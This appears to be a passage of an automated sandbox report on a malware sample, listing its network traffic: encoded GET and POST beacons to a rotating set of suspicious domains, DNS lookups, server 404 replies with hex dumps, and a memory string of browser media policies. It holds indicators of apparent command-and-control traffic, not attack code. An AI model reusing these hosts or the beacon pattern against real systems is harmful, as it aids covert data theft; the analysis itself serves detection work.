                Source: global trafficHTTP traffic detected: GET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1Host: www.nng83.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1Host: www.brickhills.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /qrpv/?Z1EO=OvfHeluUy&pluxVm=WiX0LzPqOnM4b37+7/q2MnJgJJwmlCG/8poUwA5NsFkBp/VurdzYoSVVPF8rA/Ka5BkZn+mZS0ORkGe6TXFOOAiLIJoZGeMwExFXk2ddigf2T3UmxoiawIQ= HTTP/1.1Host: www.goldbracelet.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /8h0h/?pluxVm=WsdblX5oKRyaFeduXpZZBYfr3KMp+WtxHr+UJvo5A+6DW3eJEDxswcp5ZYJtgZW5p4zYKJkjyVN2mc228t1VZlr/R5LO29syDvrfnZcSIMlt6XRuzenYE6E=&Z1EO=OvfHeluUy HTTP/1.1Host: www.0be.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /1cwp/?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo= HTTP/1.1Host: www.smartgov.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUy HTTP/1.1Host: www.hayaniya.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /7znk/?Z1EO=OvfHeluUy&pluxVm=HSNOOCSycaWbpWp1pFuTHgyNeMyGT259cyc1jurPotVrvnXLICbtqfVvbaWKwlIlASBzdIxRFAa/wDiZdCYNsQsDHbsFXQKeKhShRpSMwKmQ7kRuiU3WeuA= HTTP/1.1Host: www.dialogpriest.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /8orf/?pluxVm=yDQ89DLfYgJiEyke7+6q5gE87/fs/XemaXtjJXohmXUOdwNzAwGJy6nqls5iDTVnp9Zi+kacGLaYAX6Ad+cHYYESeoueNmRKrwXa18136rVeVa07ORWAOLw=&Z1EO=OvfHeluUy HTTP/1.1Host: www.224466.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1Host: www.88rtp.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1Host: www.kubex.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1Host: www.sido247.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1Host: www.glowups.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1Host: www.epicurecooks.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1Host: www.eichner.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1Host: www.juewucangku.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1Host: www.nng83.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1Host: www.brickhills.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: cacls.exe, 00000004.00000002.182792565138.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","pat
                Source: global trafficDNS traffic detected: DNS query: www.88rtp.biz
                Source: global trafficDNS traffic detected: DNS query: www.kubex.dev
                Source: global trafficDNS traffic detected: DNS query: www.sido247.pro
                Source: global trafficDNS traffic detected: DNS query: www.glowups.life
                Source: global trafficDNS traffic detected: DNS query: www.epicurecooks.world
                Source: global trafficDNS traffic detected: DNS query: www.eichner.pro
                Source: global trafficDNS traffic detected: DNS query: www.juewucangku.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nng83.top
                Source: global trafficDNS traffic detected: DNS query: www.brickhills.site
                Source: global trafficDNS traffic detected: DNS query: www.foggvdqutxzgea.xyz
                Source: global trafficDNS traffic detected: DNS query: www.goldbracelet.top
                Source: global trafficDNS traffic detected: DNS query: www.0be.info
                Source: global trafficDNS traffic detected: DNS query: www.smartgov.shop
                Source: global trafficDNS traffic detected: DNS query: www.hayaniya.org
                Source: global trafficDNS traffic detected: DNS query: www.dialogpriest.online
                Source: global trafficDNS traffic detected: DNS query: www.224466.top
                Source: unknownHTTP traffic detected: POST /o5mm/ HTTP/1.1Host: www.kubex.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Origin: http://www.kubex.devReferer: http://www.kubex.dev/o5mm/Content-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 52 39 45 73 36 49 49 47 6e 30 6e 72 57 5a 4a 74 70 33 42 62 37 58 6b 69 62 64 39 5a 68 79 64 47 6b 79 66 71 51 69 53 6b 73 67 4e 4f 69 41 6b 77 31 58 53 54 2f 42 41 49 34 49 42 67 4e 31 49 58 34 70 52 51 34 38 74 6a 46 62 6a 30 57 4d 6c 2f 59 64 2b 6e 30 48 72 32 77 6b 45 34 70 35 48 2f 47 45 50 67 4d 69 6b 74 62 4c 63 56 46 54 4b 6e 4b 6b 6b 74 61 76 72 65 64 71 4a 74 43 44 39 47 6d 59 4d 7a 57 73 74 65 5a 36 47 39 67 37 2b 47 2f 4e 6d 74 33 54 65 64 46 79 66 74 54 57 4e 30 42 56 2f 51 58 6e 57 6b 4b 71 6c 30 4f 59 54 50 6b 53 6d 4f 45 67 3d 3d Data Ascii: pluxVm=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3TedFyftTWN0BV/QXnWkKql0OYTPkSmOEg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:51:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 03 Dec 2024 13:51:45 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 03 Dec 2024 13:51:47 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 03 Dec 2024 13:51:50 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Tue, 03 Dec 2024 13:51:53 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 